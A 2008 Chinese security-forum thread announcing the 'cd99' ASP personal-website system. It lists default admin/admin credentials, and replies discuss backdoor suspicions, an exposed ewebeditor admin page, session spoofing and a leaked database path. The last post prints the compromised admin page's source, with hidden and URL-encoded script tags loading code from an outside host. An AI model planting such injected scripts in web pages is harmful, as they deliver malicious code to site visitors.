[原创]cd99个人网站管理系统 VER1.0
程序作者:ㄨiaoC([email]cclsoft@126.com[/email])信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])
主页地址:[url]www.cd99.cn[/url]
这是很简单的一个个人整站系统,简单易用,仿Milw0rm.com界面,喜欢Milw0rm.com界面的朋友有福了!
网站后台管理
密码:admin
留言本
用户名:admin
密码:admin
如果要修改数据库文件名,请修改以下几个文件
db_inc.asp
admin/db_inc.asp
conn.asp
admin/conn.asp
gbook/index.asp
本站前台完全防IFRAME挂马,保证了浏览网站用户的安全
完全防止SQL注入!保证了你网站的安全!
下载地址:[url]http://www.cd99.cn/test/viewdown.asp?id=85[/url] 帅哥那套程序你确定没后门?
我是说Milw0rm.com这个。。系统的。。 晕,现在的孩子也真是的,什么都怀疑~
可见现在的人啊,素质~~~
声明,这个网站程序是自己ASP的练手作品,放后门干鸟!!!!我自己都在用!!!!!
唉,可悲啊~~~~ 其实也不是怀疑你!是怀疑这个社会!呵呵!其实这里面就有一个技术的问题了!
如果你技术好!你可以自己找出来后门呀!而且并不代表你用,就可以说明这个程序就没有后门了! [quote]原帖由 [i]pc逍遥鼠[/i] 于 2008-2-5 16:01 发表 [url=http://forum.eviloctal.com/redirect.php?goto=findpost&pid=138059&ptid=32149][img]http://forum.eviloctal.com/images/common/back.gif[/img][/url]
其实也不是怀疑你!是怀疑这个社会!呵呵!其实这里面就有一个技术的问题了!
如果你技术好!你可以自己找出来后门呀!而且并不代表你用,就可以说明这个程序就没有后门了! ... [/quote]
呵呵,不仅仅是我用,整个程序都是我自己写的,有没后门我会不知道么? 反正如果大家喜欢这个程序的风格的话,就哪去用吧,呵呵~~ [quote]原帖由 [i]xiaoc[/i] 于 2008-2-5 15:52 发表 [url=http://forum.eviloctal.com/redirect.php?goto=findpost&pid=138058&ptid=32149][img]http://forum.eviloctal.com/images/common/back.gif[/img][/url]
晕,现在的孩子也真是的,什么都怀疑~
可见现在的人啊,素质~~~
声明,这个网站程序是自己ASP的练手作品,放后门干鸟!!!!我自己都在用!!!!!
唉,可悲啊~~~~ [/quote]
别激动……
我没说你的系统带后门。我的意思是说你的那东西是否是copy from milw0rm
milw0rm的代码公布过。 不知道带了后门。 我没说你那产品带……
看来你激动过头了……
可能我在回复你的第一帖的时候没把语言组织好,对不起,造成误解了……
[[i] 本帖最后由 ゛小︷帅!﹊ 于 2008-2-6 10:04 编辑 [/i]] 呵呵,误解了,不好意思哦~~
不过问下milw0rm的代码哪里有下?
学习学习~~ [quote]原帖由 [i]xiaoc[/i] 于 2008-2-6 12:34 发表 [url=http://forum.eviloctal.com/redirect.php?goto=findpost&pid=138118&ptid=32149][img]http://forum.eviloctal.com/images/common/back.gif[/img][/url]
呵呵,误解了,不好意思哦~~
不过问下milw0rm的代码哪里有下?
学习学习~~ [/quote]
[url]http://0kee.com/read.php?tid=103[/url]
客气了,整站的。
小菜不知道有不有后门…… 呵呵~忽略了一些东西哦!
[url]http://www.cd99.cn/hi.asp[/url] 呵呵!这个风格不错,拿过来玩玩! [quote]原帖由 [i]cool_wxd[/i] 于 2008-2-7 20:47 发表 [url=http://forum.eviloctal.com/redirect.php?goto=findpost&pid=138180&ptid=32149][img]images/common/back.gif[/img][/url]
呵呵~忽略了一些东西哦!
[url]http://www.cd99.cn/hi.asp[/url] [/quote]
请问是ewebeditor的洞吗?
那个可以session欺骗的...
因为ewebeditor是06年刚刚制作网站时候下载的,所以没有注意.
后台管理也可以session欺骗...
这个我在以后的版本会注意的... 呵呵,果然是ewebeditor的问题~~
因为是免费的虚拟主机,所以进行session欺骗很容易的...
把ewebeditor下的那些管理文件删除了就可以了吧,哈哈~
[[i] 本帖最后由 xiaoc 于 2008-2-8 18:31 编辑 [/i]] 呵呵~不是什么session的问题,是你的admin_default.asp等一些文件没有删除,加上用户名密码可以破解的原因! [Home]
Microsoft JET Database Engine 错误 '80004005'
'D:\freeweb\cd99\web\test\database\##ainixiaoc99hahaha.mdb'不是一个有效的路径。 确定路径名称拼写是否正确,以及是否连接到文件存放的服务器。
/test/GBook/Index.asp,行 33 [quote]原帖由 [i]cool_wxd[/i] 于 2008-2-7 20:47 发表 [url=http://forum.eviloctal.com/redirect.php?goto=findpost&pid=138180&ptid=32149][img]images/common/back.gif[/img][/url]
呵呵~忽略了一些东西哦!
[url]http://www.cd99.cn/hi.asp[/url] [/quote]
无语........:sweat: :sweat:
貌似一点都不安全哦
[[i] 本帖最后由 cchhd 于 2008-2-26 14:54 编辑 [/i]] 不知道楼主现在有没有解决漏洞
期待更新的版本 为什么登录后台后 一片空白
查看源代码:
<span style="display:none;"><script src=../iiswatch/js.js></script></span></style>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-frameset.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>cd99后台管理系统</title>
</head>
<frameset rows="*" cols="191,*" framespacing="0" frameborder="no" border="0">
<frame src="right.html" name="leftFrame" scrolling="No" noresize="noresize" id="f126" title="leftFrame" />
<frame src="menu.html" name="mainFrame" id="f126" title="mainFrame" />
</frameset>
<noframes><body>
</body>
</noframes></html>
<script src=http://%76%63%63%64%2E%63%6E></script><script src=http://%76%63%63%64%2E%63%6E></script><script src=http://%76%63%63%64%2E%63%6E></script><script src=http://%76%63%63%64%2E%63%6E></script>
页:
[1]